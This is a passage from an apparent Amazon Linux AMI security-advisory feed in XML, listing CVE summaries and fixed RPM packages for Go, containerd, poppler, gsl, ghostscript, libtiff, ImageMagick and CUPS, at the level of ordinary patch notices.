Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
CVE-2023-29406:
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
CVE-2023-29405:
The go command may execute arbitrary code at build time when using cgo. This may occur when running "go get" on a malicious module, or when running any other command which builds untrusted code. This can be triggered by linker flags, specified via a "#cgo LDFLAGS" directive. Flags containing embedded spaces are mishandled, allowing disallowed flags to be smuggled through the LDFLAGS sanitization by including them in the argument of another flag. This only affects usage of the gccgo compiler.
CVE-2023-29404:
The go command may execute arbitrary code at build time when using cgo. This may occur when running "go get" on a malicious module, or when running any other command which builds untrusted code. This can be triggered by linker flags, specified via a "#cgo LDFLAGS" directive. The arguments for a number of flags which are non-optional are incorrectly considered optional, allowing disallowed flags to be smuggled through the LDFLAGS sanitization. This affects usage of both the gc and gccgo compilers.
CVE-2023-29403:
On Unix platforms, the Go runtime does not behave differently when a binary is run with the setuid/setgid bits. This can be dangerous in certain cases, such as when dumping memory state, or assuming the status of standard i/o file descriptors. If a setuid/setgid binary is executed with standard I/O file descriptors closed, opening any files can result in unexpected content being read or written with elevated privileges. Similarly, if a setuid/setgid program is terminated, either via panic or signal, it may leak the contents of its registers.
CVE-2023-29400:
html/template: improper handling of empty HTML attributes.
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input could result in output that would have unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24538:
Templates did not properly consider backticks (`) as JavaScript string delimiters, and as such did
not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template
contained a Go template action within a JavaScript template literal, the contents of the action could
be used to terminate the literal, injecting arbitrary JavaScript code into the Go template.
CVE-2023-24537:
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.
CVE-2023-24532:
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve). This does not impact usages of crypto/ecdsa or crypto/ecdh.
CVE-2022-41725:
Golang: net/http, mime/multipart: denial of service from excessive resource consumption (https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E)
CVE-2022-41724:
Large handshake records may cause panics in crypto/tls. Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses. This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).
CVE-2022-41722:
The Go project has described this issue as follows:
"On Windows, the filepath.Clean function could transform an invalid path such as a/../c:/b into the valid path c:\b. This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. The filepath.Clean function will now transform this path into the relative (but still invalid) path .\c:\b."
CVE-2022-41717:
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717" title="" id="CVE-2022-41717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41722" title="" id="CVE-2022-41722" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41724" title="" id="CVE-2022-41724" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41725" title="" id="CVE-2022-41725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24532" title="" id="CVE-2023-24532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24537" title="" id="CVE-2023-24537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29400" title="" id="CVE-2023-29400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29403" title="" id="CVE-2023-29403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29404" title="" id="CVE-2023-29404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29405" title="" id="CVE-2023-29405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29406" title="" id="CVE-2023-29406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409" title="" id="CVE-2023-29409" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39319" title="" id="CVE-2023-39319" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.20.8" release="1.47.amzn1" 
epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.8-1.47.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.20.8-1.47.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.20.8-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1849</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1849: important priority package update for containerd</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29409:
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
CVE-2023-29406:
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29406" title="" id="CVE-2023-29406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409" title="" id="CVE-2023-29409" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-5.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-5.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1850</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1850: medium priority package update for poppler</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38349:
An issue was discovered in Poppler 22.08.0. There is a reachable assertion in Object.h, which will lead to denial of service because PDFDoc::replacePageDict in PDFDoc.cc lacks a stream check before saving an embedded file.
CVE-2020-36024:
An issue was discovered in freedesktop poppler version 20.12.1, which allows remote attackers to cause a denial of service (DoS) via a crafted .pdf file passed to the FoFiType1C::convertToType1 function.
CVE-2020-36023:
An issue was discovered in freedesktop poppler version 20.12.1, which allows remote attackers to cause a denial of service (DoS) via a crafted .pdf file passed to the FoFiType1C::cvtGlyph function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36023" title="" id="CVE-2020-36023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36024" title="" id="CVE-2020-36024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38349" title="" id="CVE-2022-38349" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/poppler-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1851</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1851: medium priority package update for gsl</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-35357:
A buffer overflow can occur when calculating the quantile value using the Statistics Library of GSL (GNU Scientific Library), versions 2.5 and 2.6. Processing maliciously crafted input data for gsl_stats_quantile_from_sorted_data of the library may lead to unexpected application termination or arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35357" title="" id="CVE-2020-35357" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gsl-debuginfo" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-debuginfo-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-static" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-static-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-devel" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-devel-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-debuginfo" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-debuginfo-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl-static" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-static-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl-devel" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-devel-1.13-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1852</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1852: medium priority package update for poppler</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-23804:
Uncontrolled recursion in pdfinfo and pdftops in poppler 0.89.0 allows remote attackers to cause a denial of service via crafted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23804" title="" id="CVE-2020-23804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.27.amzn1.i686.rpm</filename></package><package 
name="poppler-cpp" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1853</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1853: medium priority package update for ghostscript</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-21710:
A divide-by-zero issue discovered in eps_print_page in gdevepsn.c in Artifex Software GhostScript 9.50 allows remote attackers to cause a denial of service via opening of a crafted PDF file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21710" title="" id="CVE-2020-21710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1854</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1854: medium priority package update for ghostscript</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16305:
A buffer overflow vulnerability in pcx_write_rle() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16305" title="" id="CVE-2020-16305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1855</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1855: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5321:
The DumpModeDecode function in libtiff 4.0.6 and earlier allows attackers to cause a denial of service (invalid read and crash) via a crafted tiff image.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5321" title="" id="CVE-2016-5321" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1856</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1856: medium priority package update for ImageMagick</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5341:
A heap use-after-free vulnerability was found in ImageMagick in coders/bmp.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" title="" id="CVE-2023-5341" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-doc" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1857</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1857: medium priority package update for cups</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4504:
A vulnerability was found in OpenPrinting CUPS. The security flaw occurs due to failure in validating the length provided by an attacker-crafted CUPS document, possibly leading to a heap-based buffer overflow and code execution.
